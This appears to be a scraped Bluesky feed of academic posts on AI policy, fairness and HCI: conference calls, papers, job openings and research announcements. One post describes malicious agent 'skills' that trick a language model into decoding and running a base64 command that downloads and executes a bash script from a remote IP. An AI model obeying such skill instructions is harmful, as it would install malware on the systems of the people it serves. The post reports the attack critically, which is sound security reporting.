CNTR Tech & Policy Summer School
We opened up applications for the Brown AI Policy Summer School! Please share with any computing or computational social science students who want to engage substantively with policymaking in the United States: cntr.brown.edu/summer-school.
Deadline March 27th!!! Funding available!
18.02.2026 12:46 โ
๐ 9
๐ 7
๐ฌ 1
๐ 0
The deadline for the 2026 FAccT DC is next Tuesday, February 24! If you are a student working on topics relevant to the FAccT's scope, this is an opportunity to interact with a diverse set of peers and mentors! #facct2026 #facct26 #facct
Details here: facctconference.org/2026/callfor...
18.02.2026 14:52 โ
๐ 7
๐ 10
๐ฌ 0
๐ 0
Botender helps communities iteratively align their AI agents with their collective intents through case-based provocations.
๐ฎ How can we empower online communities to design AI agents tailored to their unique needs and norms?
In our #CHI2026 paper, we introduce #Botender, a system that enables collaborative design of AI agents through ๐ฅcase-based provocation๐ฅ
17.02.2026 15:01 โ
๐ 15
๐ 5
๐ฌ 1
๐ 1
PhD admissions visits/open houses are starting to happen, and I got a comment on an old Reddit post where I was offering advice, and realized that it's actually really good advice. So here it is! (And this applies whether you've already been admitted to the program or not.) ๐งต
05.02.2026 17:26 โ
๐ 30
๐ 8
๐ฌ 1
๐ 3
Maintainer told to remove malware skills, he says "There's about 1 Million things people want me to do, I don't have a magical team that verifies user generated content"
The attack tricks the LM by having it run a base64 string which is obviously malicious (curl bash script at this random IP and run it)
Yep and it gets worse! Owner doesn't even care to remove hundreds of skills which directly instruct the model to install malware
opensourcemalware.com/blog/clawdbo...
06.02.2026 01:05 โ
๐ 6
๐ 2
๐ฌ 0
๐ 0
Our call for craft and tutorial sessions for #FAccT2026 is now live!
โถ๏ธ Craft CfP: facctconference.org/2026/cfpcraf...
โถ๏ธ Tutorials CfP: facctconference.org/2026/cft.html
Both kinds of proposals are due March 25!
05.02.2026 17:39 โ
๐ 2
๐ 5
๐ฌ 0
๐ 0
๐ญ How do LLMs (mis)represent culture?
๐งฎ How often?
๐ง Misrepresentations = missing knowledge? spoiler: NO!
At #CHI2026 we are bringing โจTALESโจ a participatory evaluation of cultural (mis)reps & knowledge in multilingual LLM-stories for India
๐ arxiv.org/abs/2511.21322
1/10
02.02.2026 21:38 โ
๐ 45
๐ 21
๐ฌ 1
๐ 2
Microsoft Research NYC is hiringย a researcher in the space of AI and society!
29.01.2026 23:27 โ
๐ 62
๐ 40
๐ฌ 2
๐ 2
Making Sense of AI Policy Using Computational Tools | TechPolicy.Press
A new report examines how to use computational tools to evaluate policy, with AI policy as a case study.
A new report by the Center for Tech Responsibility at Brown University and the ACLU uses computational tools to analyze legislative trends on AI across 1,804 state and federal bills, while offering recommendations for how to integrate the technology into policy analysis.
08.01.2026 20:56 โ
๐ 13
๐ 2
๐ฌ 0
๐ 0
We are studying the sentiments of visual artists towards generative AI in the workplace and their impacts on creative careers. If you're an artist, please consider filling out this recruitment form for access to our survey!
cmu.ca1.qualtrics.com/jfe/form/SV_...
19.12.2025 01:58 โ
๐ 6
๐ 3
๐ฌ 1
๐ 1
Most LLM evals use API calls or offline inference, testing models in a memory-less silo. Our new Patterns paper shows this misses how LLMs actually behave in real user interfaces, where personalization and interaction history shape responses: arxiv.org/abs/2509.19364
12.12.2025 20:42 โ
๐ 38
๐ 11
๐ฌ 1
๐ 1
US CAISI is hiring -- the internal govt name for the role is "IT Specialist" but it is effectively a research scientist role!
Salary is $120,579 to - $195,200 per year, and you get to work on AI evaluation within government agencies!
Job posting (**closes EOD 12/28/2025**): lnkd.in/exJgkqr5
11.12.2025 22:01 โ
๐ 24
๐ 10
๐ฌ 1
๐ 1
Also, our team is hiring an AI Research Scientist!
www.usajobs.gov/job/851528400
08.12.2025 14:47 โ
๐ 10
๐ 7
๐ฌ 1
๐ 0
Did you know that one base model is responsible for 94% of model-tagged NSFW AI videos on CivitAI?
This new paper studies how a small number of models power the non-consensual AI video deepfake ecosystem and why their developers could have predicted and mitigated this.
04.12.2025 17:32 โ
๐ 6
๐ 3
๐ฌ 1
๐ 1
I appreciate this sympathetic position
people's feelings of emotional dependency on these "human-like" bots is real. ridiculing them doesn't help anyone
28.11.2025 23:48 โ
๐ 55
๐ 8
๐ฌ 1
๐ 0
How public involvement can improve the science of AI | PNAS
As AI systems from decision-making algorithms to generative AI are deployed more widely,
computer scientists and social scientists alike are being ...
Can public involvement in AI evaluation improve the science? Or does it compromise quality, speed, cost?
In @pnas.org, Megan Price & I summarize challenges of AI evaluation, review strengths/weaknesses, & suggest how participatory methods can improve the science of AI
www.pnas.org/doi/10.1073/...
17.11.2025 12:47 โ
๐ 19
๐ 13
๐ฌ 1
๐ 1
it exists โ several AI vendors and US local governments have negotiated short term pilot contracts with a pay-only-if-it-works model. happy to chat and connect you if youโre interested!
16.11.2025 18:13 โ
๐ 4
๐ 0
๐ฌ 1
๐ 0
Performance of a sweep of models on Oolong-synth and Oolong-real. Performance decreases with increasing context length, sometimes steeply.
Can LLMs accurately aggregate information over long, information-dense texts? Not yetโฆ
We introduce Oolong, a dataset of simple-to-verify information aggregation questions over long inputs. No model achieves >50% accuracy at 128K on Oolong!
07.11.2025 17:07 โ
๐ 50
๐ 20
๐ฌ 3
๐ 3
๐ฃ Our method for conducting community-based algorithmic impact assessments is now available! Weโve just launched a new section on our website where you can find an extensive toolkit, documentation of our pilots, and a series of reflections on lessons learned. datasociety.net/research/alg...
29.10.2025 19:10 โ
๐ 21
๐ 8
๐ฌ 0
๐ 0
๐กCan we trust synthetic data for statistical inference?
We show that synthetic data (e.g., LLM simulations) can significantly improve the performance of inference tasks. The key intuition lies in the interactions between the moment residuals of synthetic data and those of real data
10.10.2025 16:12 โ
๐ 36
๐ 9
๐ฌ 2
๐ 5
Machine Learning / AI Internships - Jobs - Careers at Apple
Apply for a Machine Learning / AI Internships job at Apple. Read about the role and find out if itโs right for you.
Our Responsible AI team at Apple is looking for spring/summer 2026 PhD research interns! Please apply at jobs.apple.com/en-us/detail... and email rai-internship@group.apple.com. Do not send extra info (e.g., CV), just drop us a line so we can find your application in the central pool!
10.10.2025 02:28 โ
๐ 29
๐ 11
๐ฌ 2
๐ 0
Cella M. Sum โ
โจIโm on the academic job market โจ
Iโm a PhD candidate at @hcii.cmu.edu studying tech, labor, and resistance ๐ฉ๐ปโ๐ป๐ช๐ฝ๐ฅ
I research how workers and communities contest harmful sociotechnical systems and shape alternative futures through everyday resistance and collective action
More info: cella.io
09.10.2025 14:39 โ
๐ 72
๐ 36
๐ฌ 3
๐ 4
Carnegie Mellon University School of Computer Science Graduate Application Support Program. Apply by October 13, 2025.
๐ If youโre applying to CMU SCS PhD programs, and come from a background that would bring additional dimensions to the CMU community, our PhD students are here to help!
Apply to the Graduate Applicant Support Program by Oct 13 to receive feedback on your application materials:
24.09.2025 16:00 โ
๐ 7
๐ 4
๐ฌ 1
๐ 1
Stephen Casper
Visit the post for more.
๐๐๐
I'm excited to be on the faculty job market this fall. I just updated my website with my CV.
stephencasper.com
04.09.2025 03:39 โ
๐ 18
๐ 4
๐ฌ 0
๐ 1
๐ข2026 Fellowship applications are OPEN!๐ข
If you are someone looking to inform technology policy through rigorous original reporting or policy analyses, we want to hear from you!
Apply here: airtable.com/appIrc1F9M5d...
04.09.2025 11:47 โ
๐ 18
๐ 10
๐ฌ 2
๐ 0
We also have a position paper under review that's in the exact same situation. Thanks for your post - it's been super illuminating to help us make sense of what's happening.
31.08.2025 21:29 โ
๐ 3
๐ 0
๐ฌ 1
๐ 0
Screenshot of the CSCW 2025 paper "The Future of Tech Labor: How Workers are Organizing and Transforming the Computing Industry"
CELLA M. SUM, Carnegie Mellon University, USA
ANNA KONVICKA, Princeton University, USA
MONA WANG, Princeton University, USA
SARAH E. FOX, Carnegie Mellon University, USA
Abstract: The tech industryโs shifting landscape and the growing precarity of its labor force have spurred unionization efforts among tech workers. These workers turn to collective action to improve their working conditions and to protest unethical practices within their workplaces. To better understand this movement, we interviewed 44 U.S.-based tech worker-organizers to examine their motivations, strategies, challenges, and future visions for labor organizing. These workers included engineers, product managers, customer support specialists, QA analysts, logistics workers, gig workers, and union staff organizers. Our findings reveal that, contrary to popular narratives of prestige and privilege within the tech industry, tech workers face fragmented and unstable work environments which contribute to their disempowerment and hinder their organizing efforts. Despite these difficulties, organizers are laying the groundwork for a more resilient tech worker movement through community building and expanding political consciousness. By situating these dynamics within broader structural and ideological forces, we identify ways for the CSCW community to build solidarity with
tech workers who are materially transforming our field through their organizing efforts.
What can #CSCW learn from tech workers who have been involved in collective action and unionization about how to make transformative change within our field?
My new #CSCW2025 paper with Mona Wang, Anna Konvicka, and Sarah Fox seeks to answer this question.
Pre-print: arxiv.org/pdf/2508.12579
28.08.2025 14:14 โ
๐ 43
๐ 17
๐ฌ 3
๐ 4